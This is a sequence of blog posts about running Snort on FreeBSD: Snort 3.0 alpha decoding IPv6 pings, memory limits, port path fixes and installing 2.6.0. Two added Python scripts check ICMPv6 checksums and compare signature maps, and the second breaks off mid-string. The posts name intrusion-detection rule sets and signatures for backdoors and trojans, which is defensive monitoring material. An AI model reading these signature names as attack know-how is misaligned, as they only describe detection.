
Friday, 06 April 2007

Snort 3.0 Alpha and IPv6

For the past few days I've been playing with alpha code for Snort 3.0, recently announced. One of the most interesting aspects of Snort 3.0 is the fact that operation is controlled by a Lua interpreter. It's a little like logging into a Cisco router and it's going to change the way everyone uses and interacts with Snort.

I tested snort-03.0.0.a1.4 on a FreeBSD 6.x box with the lua-5.1.1_2 package installed. I compiled it with:

$ ./configure --with-lua-includes=/usr/local/include/lua51/ \
    --with-lua-libraries=/usr/local/lib/lua51/ \
    --prefix=/usr/local/snort-03.0.0.a1.4/
$ make
$ make install

The alpha code does not have a detection engine yet. It's like the original Snort -- it's only a packet decoder. I thought you might like to see what it looks like when Snort 3.0 decodes IPv6 packets. I'm using this IPv6-only FreeBSD scenario.

When you start Snort, it activates but does nothing until you tell it.

cel433:/usr/local/snort-03.0.0.a1.4/bin# ./snort
[*] DAQ Modules Loaded...
[*] Loading decoder modules
[+] Loaded ethernet
[+] Loaded null
[+] Loaded arp
[+] Loaded ip
[+] Loaded tcp
[+] Loaded udp
[+] Loaded icmp
[+] Loaded icmp6
[+] Loaded gre
[+] Loaded mpls
[+] Loaded 8021q
[+] Loaded ipv6
[+] Loaded ppp
[+] Loaded pppoe
[+] Loaded raw
[*] Decoder initialized...
[*] Flow manager initialized...
[*] Data source subsystem loaded
[*] Engine manager initialized
[*] Loading command interface
[!] Loading sfips command metatable
[!] Loading data source command metatable
[!] Loading engine command metatable
,,_ -*> Snort! <*-
o" )~ Version 03.0.0.a1.4 (Build 7) [PRE-ALPHA]
'''' By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 2006 Sourcefire Inc.

You tell Snort to begin sniffing using these commands.

> dofile("/usr/local/src/snort-03.0.0.a1.4/etc/snort.lua")
snort> fsniff("fxp0")
Creating new data source
Engine "e2" created
Linking engine "e2" to data source "src2"
init_pcap: Initializing network interface fxp0
init_pcap: netmask lookup for device fxp0: fxp0: no IPv4 address assigned
Device type is Ethernet on interface fxp0
Flow manager "a5a891c4-e448-11db-b5e1-00045a7822bf" created with 16384 flow capacity
[*] Data Source Config:
Name: src2
Type: pcap
Interface: fxp0
Filename:
Snaplen: 1514
Flags: 0x00000002
Display: ethernet (4)
Filter command:
DAQ: 0x807e400
User Context: 0x808f3c0
User Data: 0x0
Max flows: 16384
Max idle: 10
Memcap: 10000000
[*] Flow Manager Config:
Max flows: 16384
Max idle: 10
Memcap: 10000000
[*] DAQ config:
Interface: fxp0
Snaplen: 1514
Datalink: 1
Count: 0
Packet Count: 0
Promisc flag: 1
File flag: 0
pcap ptr: 0x80ac400
analysis context ptr: 0x80a9600
[*] Spawning engine thread!

I generate ICMPv6 traffic that Snort can see.

mwmicro:/home/string$ ping6 -c 1 p200
PING6(56=40+8+8 bytes) fe80::200:d1ff:feed:8c74%sf3 --> fe80::204:5aff:fe79:43a7%sf3
16 bytes from fe80::204:5aff:fe79:43a7%sf3, icmp_seq=0 hlim=64 time=1.131 ms

--- p200 ping6 statistics ---
1 packets transmitted, 1 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 1.131/1.131/1.131/0.000 ms

Here is what Snort reports.

snort> [*] Packet on interface fxp0
[*] Packet Info
Serial: 1
Packet Time: 04/06-14:11:13.098377
Packet Bytes: 70
Captured Bytes: 70
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:00:D1:ED:8C:74
Dest MAC Address: 00:04:5A:79:43:A7
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 16
Next Header: ipv6-icmp
Hop Limit: 64
Src Addr: fe80::200:d1ff:feed:8c74
Dst Addr: fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
Type: 128 (Echo Request)
Code: 0
Id: 11124
Seq: 0
Checksum: 22822 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 46 16 55 0E 00 0A 64 63 F.U...dc

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
Serial: 2
Packet Time: 04/06-14:11:13.098802
Packet Bytes: 70
Captured Bytes: 70
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:04:5A:79:43:A7
Dest MAC Address: 00:00:D1:ED:8C:74
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 16
Next Header: ipv6-icmp
Hop Limit: 64
Src Addr: fe80::204:5aff:fe79:43a7
Dst Addr: fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
Type: 129 (Echo Reply)
Code: 0
Id: 11124
Seq: 0
Checksum: 22566 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 46 16 55 0E 00 0A 64 63 F.U...dc

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
Serial: 3
Packet Time: 04/06-14:11:18.096779
Packet Bytes: 86
Captured Bytes: 86
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:00:D1:ED:8C:74
Dest MAC Address: 00:04:5A:79:43:A7
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 32
Next Header: ipv6-icmp
Hop Limit: 255
Src Addr: fe80::200:d1ff:feed:8c74
Dst Addr: fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
Type: 135 (ND Neighbor Solicitation)
Code: 0
Checksum: 32787 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 01 01 00 00 D1 ED 8C 74 .......t

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
Serial: 4
Packet Time: 04/06-14:11:18.097203
Packet Bytes: 78
Captured Bytes: 78
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:04:5A:79:43:A7
Dest MAC Address: 00:00:D1:ED:8C:74
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 24
Next Header: ipv6-icmp
Hop Limit: 255
Src Addr: fe80::204:5aff:fe79:43a7
Dst Addr: fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
Type: 136 (ND Neighbor Advertisement)
Code: 0
Checksum: 40574 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 02 04 5A FF FE 79 43 A7 ..Z..yC.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
Serial: 5
Packet Time: 04/06-14:11:18.097456
Packet Bytes: 86
Captured Bytes: 86
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:04:5A:79:43:A7
Dest MAC Address: 00:00:D1:ED:8C:74
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 32
Next Header: ipv6-icmp
Hop Limit: 255
Src Addr: fe80::204:5aff:fe79:43a7
Dst Addr: fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
Type: 135 (ND Neighbor Solicitation)
Code: 0
Checksum: 32787 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 01 01 00 04 5A 79 43 A7 ....ZyC.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
Serial: 6
Packet Time: 04/06-14:11:18.097744
Packet Bytes: 78
Captured Bytes: 78
Layers: 4
[*] Ethernet (14 bytes)
Source MAC Address: 00:00:D1:ED:8C:74
Dest MAC Address: 00:04:5A:79:43:A7
Encapsulated Protocol: IPv6
[*] Internet Protocol version 6 (40 bytes)
Version: 6
Class: 0 (0x0)
Flow Tag: 96 (0x60)
Packet Length: 24
Next Header: ipv6-icmp
Hop Limit: 255
Src Addr: fe80::200:d1ff:feed:8c74
Dst Addr: fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
Type: 136 (ND Neighbor Advertisement)
Code: 0
Checksum: 24128 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 02 00 D1 FF FE ED 8C 74 .......t

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Finally I tell Snort to shut down.

sfips.shutdown()
[*] SFIPS ACTIVE data source src2 received 6 packets on fxp0
Analyzed: 6 (100.000%)
Dropped: 0 (0.000%)
[-] Ethernet Stats:
Count: 6
[-] IPv6 Stats:
Count: 6
[-] ICMPv6 Stats:
Count: 6
Bad Csum: 6
[-] Raw Stats:
Count: 6
Bytes: 48

This is obviously only the beginning. I plan to learn more about Lua to take advantage of the power in Snort 3.0.
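Every ICMPv6 packet in the dumps above is flagged "INVALID 0000", and the shutdown statistics count all six as Bad Csum. The following Python script is an added example, not part of the original post and not Snort code: it rebuilds the echo request and reply from the fields the decoder printed (addresses, type, id, sequence, payload) and recomputes the ICMPv6 checksum over the IPv6 pseudo-header as RFC 2460 section 8.1 specifies. The recomputed values come out to 22822 and 22566, matching what was on the wire, so the packets were sound and the pre-alpha decoder simply was not computing ICMPv6 checksums yet. The packet-building helpers are my own; the constants are the values shown in the dumps.

```python
import ipaddress
import struct

ICMPV6_NEXT_HEADER = 58  # IPv6 Next Header value for ICMPv6

# Fields taken from the Snort 3.0 packet dumps above (serials 1 and 2).
HOST_A = "fe80::200:d1ff:feed:8c74"   # ping6 sender
HOST_B = "fe80::204:5aff:fe79:43a7"   # ping6 target
ECHO_PAYLOAD = bytes.fromhex("4616550e000a6463")  # the 8-byte payload shown
ECHO_ID, ECHO_SEQ = 11124, 0


def ones_complement_sum(data: bytes) -> int:
    """Sum 16-bit big-endian words with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"                 # odd length: pad with a zero byte
    total = sum(word for (word,) in struct.iter_unpack("!H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def icmpv6_checksum(src: str, dst: str, icmp: bytes) -> int:
    """Compute the ICMPv6 checksum over the IPv6 pseudo-header plus the message.

    The pseudo-header is: source address, destination address, 32-bit
    upper-layer length, three zero bytes, Next Header value. The checksum
    field inside the message is treated as zero while summing.
    """
    pseudo = (ipaddress.IPv6Address(src).packed
              + ipaddress.IPv6Address(dst).packed
              + struct.pack("!I3xB", len(icmp), ICMPV6_NEXT_HEADER))
    zeroed = icmp[:2] + b"\x00\x00" + icmp[4:]
    return 0xFFFF ^ ones_complement_sum(pseudo + zeroed)


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes,
               checksum: int = 0) -> bytes:
    """Build an ICMPv6 echo request (type 128) or echo reply (type 129)."""
    return struct.pack("!BBHHH", icmp_type, 0, checksum, ident, seq) + payload


def stored_checksum(icmp: bytes) -> int:
    """The checksum field as carried in the message (bytes 2-3)."""
    return struct.unpack("!H", icmp[2:4])[0]


def checksum_is_valid(src: str, dst: str, icmp: bytes) -> bool:
    """True when the carried checksum matches the recomputed one."""
    return icmpv6_checksum(src, dst, icmp) == stored_checksum(icmp)


# The two packets exactly as the decoder showed them, including their checksums.
ECHO_REQUEST = build_echo(128, ECHO_ID, ECHO_SEQ, ECHO_PAYLOAD, checksum=22822)
ECHO_REPLY = build_echo(129, ECHO_ID, ECHO_SEQ, ECHO_PAYLOAD, checksum=22566)


if __name__ == "__main__":
    for name, src, dst, pkt in (("request", HOST_A, HOST_B, ECHO_REQUEST),
                                ("reply", HOST_B, HOST_A, ECHO_REPLY)):
        print(f"echo {name}: stored {stored_checksum(pkt)}, "
              f"computed {icmpv6_checksum(src, dst, pkt)}, "
              f"valid={checksum_is_valid(src, dst, pkt)}")
    # Flip one payload bit to show that a genuinely bad checksum is caught.
    damaged = ECHO_REQUEST[:-1] + bytes([ECHO_REQUEST[-1] ^ 0x01])
    print("damaged request valid =", checksum_is_valid(HOST_A, HOST_B, damaged))
```

The reply checksum differs from the request's by exactly 0x100 because the only change in the summed data is the type byte (128 to 129) and the addresses swap places, which does not alter the pseudo-header sum.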

Saturday, 16 December 2006

Pointer to Snort 3.0 Briefing Summary

Saad Kadhi kindly pointed me to this blog post which summarizes a talk given by Marty Roesch. Saad describes Marty's plans for Snort 3.0, and I recommend taking a look.

Tuesday, 07 November 2006

Bejtlich Cited in Sourcefire IPO Story

Bill Brenner published this quote in his story Sourcefire IPO could fuel Snort, users say:

The infrastructure to support Snort isn't cheap and Sourcefire isn't flush with cash, said Richard Bejtlich, founder of the Washington, D.C.-based consultancy Tao Security. "The money to keep Snort thriving has to come from somewhere, and an IPO could give Snort more legs," he said.

I based this thought on the following from Sourcefire's S-1, listed under Risks Related to Our Business:

We have incurred operating losses each year since our inception in 2001. Our net loss was approximately $10.5 million for the year ended December 31, 2004, $5.5 million for the year ended December 31, 2005 and $2.9 million for the nine months ended September 30, 2006. Our accumulated deficit as of September 30, 2006 is approximately $40.3 million.

It looks like Sourcefire's losses are narrowing, which points to future profitability. My point is that development of Snort and associated software (RNA, etc.) takes significant resources. While it might not be that difficult to fork Snort and maintain its code base, adding significant features and developing complex rules would be extremely tough for a noncommercial enterprise to sustain.

Tuesday, 05 September 2006

Snort 2.6.0 FreeBSD Port Problem

You may have read that Snort 2.6.0 is in the FreeBSD ports tree now. I installed the package this morning and learned there is a problem with the specification for the dynamic components. Specifically, from snort.conf:


dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
...
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so

FreeBSD does not use this structure. Change those entries to:

dynamicpreprocessor directory /usr/local/lib/snort/dynamicpreprocessor/
...
dynamicengine /usr/local/lib/snort/dynamicengine/libsf_engine.so

You can also pass the necessary locations via the command line.

I've submitted a FreeBSD PR.

Snort 2.6.0 High Memory Usage on FreeBSD

I've been working with Snort 2.6.0 on FreeBSD.

When you look at the snort.conf you'll see a bunch of rules commented out.

# include $RULE_PATH/web-attacks.rules
# include $RULE_PATH/backdoor.rules
# include $RULE_PATH/shellcode.rules
# include $RULE_PATH/policy.rules
# include $RULE_PATH/porn.rules
# include $RULE_PATH/info.rules
# include $RULE_PATH/icmp-info.rules
# include $RULE_PATH/virus.rules
# include $RULE_PATH/chat.rules
# include $RULE_PATH/multimedia.rules
# include $RULE_PATH/p2p.rules
# include $RULE_PATH/spyware-put.rules

When you start Snort you'll see it uses much more memory compared to earlier versions.

654 root 1 -58 0 248M 247M bpf 0 0:01 3.30% snort

If this is too much, and you are willing to sacrifice Snort performance, you can enable the following in snort.conf:

config detection: search-method lowmem

This results in less memory usage.

656 root 1 -58 0 39800K 39128K bpf 0 0:01 0.00% snort

With this option enabled you can even uncomment all rules.

661 root 1 -58 0 59224K 58580K bpf 0 0:01 1.95% snort

What if you want the best performance and all rules? Well, on FreeBSD you are going to encounter a 512 MB default RAM limitation that will prevent Snort from running.
 
# limit
cputime unlimited
filesize unlimited
datasize 524288 kbytes
stacksize 65536 kbytes
coredumpsize unlimited
memoryuse unlimited
vmemoryuse unlimited
descriptors 11095
memorylocked unlimited
maxproc 5547
sbsize unlimited

You can change this by making the following entries in /boot/loader.conf:

kern.dfldsiz="1G" # Set the initial data size limit
kern.maxdsiz="1G" # Set the max data size

Reboot when done. Here is the result.

# limit
cputime unlimited
filesize unlimited
datasize 1048576 kbytes
stacksize 65536 kbytes
coredumpsize unlimited
memoryuse unlimited
vmemoryuse unlimited
descriptors 11095
memorylocked unlimited
maxproc 5547
sbsize unlimited


Now you can run Snort with all rules and best performance, and see it occupies over 900 MB.

645 root 1 -58 0 925M 926M bpf 0 0:04 0.00% snort

I have not tested Snort to see the effect of various options, although I prefer to run as many rule sets as makes sense for my environment. Note I did not add Bleeding or Community rule sets for this example.

Wednesday, 30 August 2006

FreeBSD Snort 2.6.0 Port Available

The FreeBSD security/snort port now offers 2.6.0. Just run portsnap fetch && portsnap update and you're ready. I'm not sure if/when Snort 2.6.0.1 will be added to the ports tree. I haven't tried 2.6.1 Beta, yet.

Friday, 04 August 2006

Snort 2.6.0 on FreeBSD

I've talked about Snort 2.6 twice before. I wanted to give 2.6 a try using the FreeBSD ports tree, but the security/snort port still offers only 2.4.5.

I looked for a problem report and found this one. It provided patches against the 2.4.5 port for 2.6.0. I decided to duplicate the /usr/ports/security/snort directory as /usr/ports/security/snort-2.6, and create Makefile.patch, distinfo.patch, and pkg-plist.patch files using the information in the PR.

Next I patched each of the 2.4.5 files.

orr:/usr/ports/security/snort-2.6# patch -p0 < Makefile.patch
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/Makefile Sat Jun 10 13:26:30 2006
|+++ ./snort/Makefile Thu Jul 6 17:34:13 2006
--------------------------
Patching file /usr/ports/security/snort/Makefile using Plan A...
Hunk #1 succeeded at 6.
Hunk #2 succeeded at 15.
Hunk #3 succeeded at 38.
Hunk #4 succeeded at 46.
Hunk #5 succeeded at 110.
done

orr:/usr/ports/security/snort-2.6# patch -p0 distinfo < distinfo.patch
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/distinfo Sat Jun 10 13:26:30 2006
|+++ ./snort/distinfo Mon Jun 12 17:03:32 2006
--------------------------
Patching file distinfo using Plan A...
Hunk #1 succeeded at 1.
done

orr:/usr/ports/security/snort# patch -p0 < pkg-plist.patch
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/pkg-plist Sat Jun 10 13:26:30 2006
|+++ ./snort/pkg-plist Thu Jul 6 17:33:06 2006
--------------------------
Patching file /usr/ports/security/snort/pkg-plist using Plan A...
Hunk #1 succeeded at 1.
Hunk #2 succeeded at 7.
Hunk #3 succeeded at 23.
done

Now I was ready to run make.

orr:/usr/ports/security/snort-2.6# make
===> Found saved configuration for snort-2.4.4
=> snort-2.4.5.tar.gz is not in /usr/ports/security/snort-2.6/distinfo.
=> Either /usr/ports/security/snort-2.6/distinfo is out of date, or
=> snort-2.4.5.tar.gz is spelled incorrectly.
*** Error code 1

Stop in /usr/ports/security/snort-2.6.

Shoot, what is that? It looked like I had a saved configuration from the last time I installed Snort. I tried to think how to fix that, then I remembered blogging it last year. I needed to eliminate the old /var/db/ports/snort/options configuration file.

orr:/var/db/pkg# cd /var/db/ports
orr:/var/db/ports# ls -al
total 6
drwxr-xr-x 3 root wheel 512 Mar 8 19:22 .
drwxr-xr-x 10 root wheel 512 Aug 4 09:49 ..
drwxr-xr-x 2 root wheel 512 Mar 8 19:22 snort
orr:/var/db/ports# cd snort
orr:/var/db/ports/snort# ls -al
total 6
drwxr-xr-x 2 root wheel 512 Mar 8 19:22 .
drwxr-xr-x 3 root wheel 512 Mar 8 19:22 ..
-rw-r--r-- 1 root wheel 239 Mar 8 19:22 options
orr:/var/db/ports/snort# cat options
# This file is auto-generated by 'make config'.
# No user-servicable parts inside!
# Options for snort-2.4.4
_OPTIONS_READ=snort-2.4.4
WITHOUT_FLEXRESP=true
WITHOUT_MYSQL=true
WITHOUT_ODBC=true
WITHOUT_POSTGRESQL=true
WITHOUT_PRELUDE=true

I decided to move the old directory to a new name.

orr:/var/db/ports# mv snort/ snort-2.4.x/

With that done, I ran make.

orr:/usr/ports/security/snort-2.6# make

I saw this menu next. [The screenshot of the options menu is not reproduced here.]

I accepted the defaults and hit OK. Make then continued:

===> Found saved configuration for snort-2.6.0
=> snort-2.6.0.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
=> Attempting to fetch from http://www.snort.org/dl/current/.
snort-2.6.0.tar.gz 44% of 3244 kB 230 kBps
...truncated...

Make completed without any problems, so I ran make install. I include all of the output here because the PR noted making some changes regarding file installation locations.

orr:/usr/ports/security/snort-2.6# make install
===> Installing for snort-2.6.0
===> snort-2.6.0 depends on shared library: pcre.0 - found
===> Generating temporary packing list
===> Checking if security/snort-2.6 already installed
...edited...
Libraries have been installed in:
/usr/local/lib/snort_dynamicpreprocessor

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
- add LIBDIR to the `LD_LIBRARY_PATH' environment variable
during execution
- add LIBDIR to the `LD_RUN_PATH' environment variable
during linking
- use the `-Wl,--rpath -Wl,LIBDIR' linker flag

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
Making install in dynamic-examples
make install-recursive
Making install in dynamic-preprocessor
make install-am
Making install in dynamic-rule
make install-am
test -z "/usr/local/bin" || /bin/sh ../mkinstalldirs "/usr/local/bin"
/bin/sh /usr/local/bin/libtool --mode=install install -s -o root -g wheel -m 555 'snort'
'/usr/local/bin/snort'
install -o root -g wheel -m 555 -s snort /usr/local/bin/snort
Making install in doc
Making install in etc
Making install in templates
Making install in contrib
Making install in schemas
Making install in rpm
Making install in m4
test -z "/usr/local/man/man8" || /bin/sh ./mkinstalldirs "/usr/local/man/man8"
install -o root -g wheel -m 444 './snort.8' '/usr/local/man/man8/snort.8'
[ -d /usr/local/etc/snort ] || /bin/mkdir -p /usr/local/etc/snort
[ -d /usr/local/share/examples/snort ] || /bin/mkdir -p /usr/local/share/examples/snort
[ -d /usr/local/etc/snort/rules ] || /bin/mkdir -p /usr/local/etc/snort/rules
[ -d /var/log/snort ] || /bin/mkdir -p /var/log/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/classification.config
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/classification.config
/usr/local/share/examples/snort/classification.config-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/gen-msg.map /usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/gen-msg.map
/usr/local/share/examples/snort/gen-msg.map-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/generators
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/generators
/usr/local/share/examples/snort/generators-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/reference.config
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/reference.config
/usr/local/share/examples/snort/reference.config-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid
/usr/local/share/examples/snort/sid-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid-msg.map
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid-msg.map
/usr/local/share/examples/snort/sid-msg.map-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/snort.conf
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/snort.conf
/usr/local/share/examples/snort/snort.conf-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/threshold.conf
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/threshold.conf
/usr/local/share/examples/snort/threshold.conf-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/unicode.map
/usr/local/etc/snort
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/etc/unicode.map
/usr/local/share/examples/snort/unicode.map-sample
install -o root -g wheel -m 444
/usr/ports/security/snort-2.6/work/snort-2.6.0/schemas/create*
/usr/local/share/examples/snort
cd /usr/ports/security/snort-2.6/work/snort-2.6.0 &&
install -o root -g wheel -m 444 RELEASE.NOTES doc/AUTHORS doc/BUGS doc/CREDITS
doc/README* doc/USAGE doc/*.pdf /usr/local/share/doc/snort
=========================================================================
Snort uses rcNG startup script and must be enabled via /etc/rc.conf
Please see /usr/local/etc/rc.d/snort.sh
for list of available variables and their description.
Configuration files are located in /usr/local/etc/snort directory.

NOTE: Starting with Snort 2.4.0 (released on 2005-04-22)
the rules are no longer included with the distribution.
Please download them from http://www.snort.org/rules/.
You might consider installing security/oinkmaster port to simplify
rules downloads and updates.
=========================================================================
===> Installing rc.d startup script(s)
===> Compressing manual pages for snort-2.6.0
===> Registering installation for snort-2.6.0

Let's see what happened to the configuration files.

orr:/usr/ports/security/snort-2.6# cd /usr/local/etc/snort
orr:/usr/local/etc/snort# ls -al
total 646
drwxr-xr-x 3 root wheel 512 Aug 4 09:59 .
drwxr-xr-x 12 root wheel 1536 Aug 4 09:59 ..
-r--r--r-- 1 root wheel 3455 Aug 4 09:59 classification.config
-r--r--r-- 1 root wheel 9822 Aug 4 09:59 gen-msg.map
-r--r--r-- 1 root wheel 1906 Aug 4 09:59 generators
-r--r--r-- 1 root wheel 548 Aug 4 09:59 reference.config
drwxr-xr-x 2 root wheel 512 Aug 4 09:59 rules
-r--r--r-- 1 root wheel 5 Aug 4 09:59 sid
-r--r--r-- 1 root wheel 519377 Aug 4 09:59 sid-msg.map
-r--r--r-- 1 root wheel 34080 Aug 4 09:59 snort.conf
-r--r--r-- 1 root wheel 2319 Aug 4 09:59 threshold.conf
-r--r--r-- 1 root wheel 53841 Aug 4 09:59 unicode.map

Those are all new. With Snort installed, I decided to test it with the -V flag.

orr:/usr/ports/security/snort-2.6# rehash
orr:/usr/ports/security/snort-2.6# snort -V

,,_ -*> Snort! <*-
o" )~ Version 2.6.0 (Build 59) FreeBSD
'''' By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 1998-2006 Sourcefire Inc., et al.

So far so good. Now I needed rules. For Snort 2.4, unregistered users can download snortrules-pr-2.4.tar.gz. Those should work with Snort 2.6 also. However, Sourcefire says the following:

These VRT Certified rulesets were released on 7/27/05 and will be updated at the time of the next major Snort release.

To me, that implies there should be a snortrules-pr-2.6.tar.gz archive available for unregistered users. I spoke to someone from Sourcefire and they said they expect to produce one shortly, once the Snort 2.4.x line is retired.

Because I am a registered Snort user, I downloaded and extracted snortrules-snapshot-CURRENT.tar.gz. This is what I found.

orr:/usr/local/etc/snort# ls rules/
VRT-License.txt local.rules smtp.rules
attack-responses.rules misc.rules snmp.rules
backdoor.rules multimedia.rules snort.conf
bad-traffic.rules mysql.rules spyware-put.rules
chat.rules netbios.rules sql.rules
classification.config nntp.rules telnet.rules
ddos.rules oracle.rules tftp.rules
deleted.rules other-ids.rules threshold.conf
dns.rules p2p.rules unicode.map
dos.rules policy.rules virus.rules
experimental.rules pop2.rules web-attacks.rules
exploit.rules pop3.rules web-cgi.rules
finger.rules porn.rules web-client.rules
ftp.rules reference.config web-coldfusion.rules
generators rpc.rules web-frontpage.rules
icmp-info.rules rservices.rules web-iis.rules
icmp.rules scan.rules web-misc.rules
imap.rules shellcode.rules web-php.rules
info.rules sid-msg.map x11.rules

You'll notice several files that are not rules.

orr:/usr/local/etc/snort# ls | grep -v rules
classification.config
doc
gen-msg.map
generators
reference.config
sid
sid-msg.map
snort.conf
threshold.conf
unicode.map

Looking at these, I found either no differences or no important ones in classification.config, reference.config, threshold.conf, and unicode.map. There is no gen-msg.map file in the rules/ directory.

The rules/sid-msg.map file differs substantially.

orr:/usr/local/etc/snort# diff sid-msg.map rules/sid-msg.map | head
2c2
< 104 || BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 ||
url,www.tlsecurity.net/backdoor/Dagger.1.4.html
---
> 104 || DELETED BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 ||
url,www.tlsecurity.net/backdoor/Dagger.1.4.html
4c4
< 106 || BACKDOOR ACKcmdC trojan scan || arachnids,445
---
> 106 || DELETED BACKDOOR ACKcmdC trojan scan || arachnids,445
6,7c6,7
< 108 || BACKDOOR QAZ Worm Client Login access || MCAFEE,98775

Therefore, use the sid-msg.map file packaged with the rule set, not the one shipped with Snort.
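To make that check mechanical, here is an added Python example (not part of the original post and not from the Snort distribution) that parses the "sid || message || reference ..." format of sid-msg.map and compares two copies: it reports SIDs present in only one file, SIDs whose message text changed, and SIDs the newer file marks DELETED. The two embedded maps are constructed for the example from the entries visible in the diff above; the 1000001 and 1000002 entries are invented local SIDs.

```python
# Constructed sample maps modelled on the diff above. The 104/106/108 lines
# mirror the entries shown there; 1000001 and 1000002 are invented local SIDs.
SNORT_SHIPPED_MAP = """\
# sid || message || reference ...
104 || BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 || url,www.tlsecurity.net/backdoor/Dagger.1.4.html
106 || BACKDOOR ACKcmdC trojan scan || arachnids,445
108 || BACKDOOR QAZ Worm Client Login access || MCAFEE,98775
1000001 || LOCAL constructed rule present only in the older map
"""

RULESET_MAP = """\
104 || DELETED BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 || url,www.tlsecurity.net/backdoor/Dagger.1.4.html
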